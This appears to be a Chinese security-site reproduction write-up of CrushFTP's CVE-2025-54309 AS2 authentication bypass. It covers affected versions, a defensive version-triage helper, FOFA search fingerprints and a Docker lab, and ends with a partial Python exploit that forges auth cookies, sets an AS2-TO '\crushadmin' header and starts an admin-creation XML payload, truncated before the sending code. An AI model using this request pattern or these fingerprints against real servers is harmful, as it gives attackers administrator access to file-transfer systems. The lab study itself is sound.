CrushFTP introduction:
CrushFTP is a cross-platform file transfer server. Besides the traditional FTP, FTPS and SFTP protocols it also serves HTTP, HTTPS, WebDAV and WebDAV over SSL, so the same user store is reachable through several front ends, including the browser-based WebInterface.
Vulnerability overview:
When the DMZ proxy feature is not in use, CrushFTP 10 before 10.8.5 and CrushFTP 11 before 11.3.4_23 mishandle AS2 validation, which lets a remote attacker obtain administrator access over HTTPS. The issue is tracked as CVE-2025-54309 and was exploited in the wild in July 2025.
Affected versions:
CrushFTP 10 < 10.8.5
CrushFTP 11 < 11.3.4_23
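As an added example (not part of the original post), the following Python helper encodes the two affected ranges above so a version string taken from an inventory or a banner can be triaged. The regular expression, the inventory format, and the treatment of a release without a `_build` suffix as build 0 are assumptions of this example, not documented CrushFTP behaviour.

```python
import re
from typing import List, Optional, Tuple

# First fixed release per major version, taken from the affected-version list above.
# A release with no "_build" suffix is treated as build 0 (an assumption of this
# example; CrushFTP's own ordering of suffix-less releases is not stated on the page).
FIRST_FIXED = {
    10: (10, 8, 5, 0),    # CrushFTP 10 < 10.8.5 is affected
    11: (11, 3, 4, 23),   # CrushFTP 11 < 11.3.4_23 is affected
}

# Matches "10.8.4", "11.3.4_22", or the same embedded in text such as a banner string.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:_(\d+))?")


def parse_version(text: str) -> Optional[Tuple[int, int, int, int]]:
    """Extract a CrushFTP version from text as (major, minor, patch, build).

    Returns None when no dotted three-part version is present.
    """
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch), int(build or 0))


def is_vulnerable(version: str) -> Optional[bool]:
    """Triage a version string against the CVE-2025-54309 affected ranges.

    True  -> inside an affected range
    False -> at or beyond the first fixed build for that major version
    None  -> unparseable, or a major version the advisory does not cover
    """
    parsed = parse_version(version)
    if parsed is None:
        return None
    fixed = FIRST_FIXED.get(parsed[0])
    if fixed is None:
        return None
    # Tuple comparison orders by major, minor, patch, then build number.
    return parsed < fixed


def triage_inventory(inventory) -> List[Tuple[str, str]]:
    """Return the (host, version) pairs from an inventory that are still affected."""
    return [(host, ver) for host, ver in inventory if is_vulnerable(ver)]


if __name__ == "__main__":
    # Constructed inventory for illustration only; hostnames are placeholders.
    hosts = [
        ("ftp-a.example", "10.8.4"),
        ("ftp-b.example", "11.3.4_22"),
        ("ftp-c.example", "CrushFTP 11.3.4_23"),
        ("ftp-d.example", "9.9.9"),
    ]
    for host, ver in triage_inventory(hosts):
        print(f"{host}: {ver} is affected by CVE-2025-54309")
```

The build suffix matters: a plain string comparison would rank "11.3.4_23" below "11.3.4_9", so the helper splits the suffix off and compares integers.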
FOFA fingerprints:
- icon_hash="-1022206565"
- title="CrushFTP WebInterface"
- body="crushftp"
Environment setup:
The reproduction uses a Docker container. Run the following commands to start CrushFTP 10. Note that the `latest` tag is mutable and may resolve to a build that is already patched, so check the version of the image you actually pulled against the affected list above before testing.
# mkdir /ftproot
# docker run -p 21:21 -p 443:443 -p 20000-20100:20000-20100 -p 2222:2222 -p 8080:8080 -p 9090:9090 -v $PWD/crushftp:/var/opt/crushftp -v /ftproot:/ftproot netlah/crushftp:latest
Once the container is up, requests to port 8080 and port 443 both respond normally.
Vulnerability reproduction:
Run the following script to bypass authentication and create an administrator account. The script as published on this page is truncated partway through the XML payload describing the new user; the code that sends the request is not on the page.
#!/usr/bin/env python3
"""
CrushFTP CVE-2025-54309 Authentication Bypass Exploit - User Creation
Based on working Watchtowr POC pattern
FOR AUTHORIZED PENETRATION TESTING ONLY - HTB Labs Use
"""

import requests
import threading
import time
import random
import string
import sys
import argparse

banner = """
╔═══════════════════════════════════════════════════════════╗
║              CrushFTP CVE-2025-54309 Exploit              ║
║          Race Condition Authentication Bypass             ║
║                 User Creation Version                     ║
║                                                           ║
║              FOR AUTHORIZED TESTING ONLY                  ║
║               HTB Labs & Pentesting Use                   ║
╚═══════════════════════════════════════════════════════════╝
"""


class CrushFTPUserCreator:
    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.c2f_value = None
        self.crush_auth_cookie = None
        self.success = False
        # Disable SSL warnings
        requests.packages.urllib3.disable_warnings()

    def generate_random_c2f(self):
        """Generate random 4-character c2f value like the working POC"""
        return ''.join(random.choices(string.ascii_letters + string.digits, k=4))

    def update_c2f_and_cookies(self):
        """Generate new c2f value and update cookies - exactly like working POC"""
        self.c2f_value = self.generate_random_c2f()
        # Use the same cookie format as working POC: the c2f value is the last
        # four characters of CrushAuth and is repeated in currentAuth
        timestamp = int(time.time() * 1000)
        random_suffix = ''.join(random.choices(string.ascii_letters + string.digits, k=24))
        self.crush_auth_cookie = f"CrushAuth={timestamp}_{random_suffix}{self.c2f_value}; currentAuth={self.c2f_value}"
        print(f"[*] Generated new c2f value: {self.c2f_value}")

    def make_request_with_as2(self):
        """Make request with AS2-TO header - following working POC pattern"""
        url = f"{self.target_url}/WebInterface/function/"
        headers = {
            "Host": self.target_url.replace("http://", "").replace("https://", ""),
            "User-Agent": "python-requests/2.32.3",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "*/*",
            "Connection": "keep-alive",
            "AS2-TO": "\\crushadmin",  # Exactly like working POC
            "Content-Type": "disposition-notification",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": self.crush_auth_cookie
        }
        # XML payload for creating admin user
        user_xml = f'''<?xml version="1.0" encoding="UTF-8"?><user type="properties">
  <max_logins_ip>8</max_logins_ip>
  <real_path_to_user>./users/MainUsers/crushadmin/</real_path_to_user>
  <root_dir>/</root_dir>
  <user_name>'''
        # The published script is cut off at this point, inside the <user_name>
        # element (the original text ends with "{sel"). The rest of the payload,
        # the code that POSTs it to `url` with `headers`, and the threaded
        # race / argparse entry point that the imports above are for are not
        # on the page.
Published on FreeBuf. This article represents the author's independent view; reproduction without authorization is prohibited.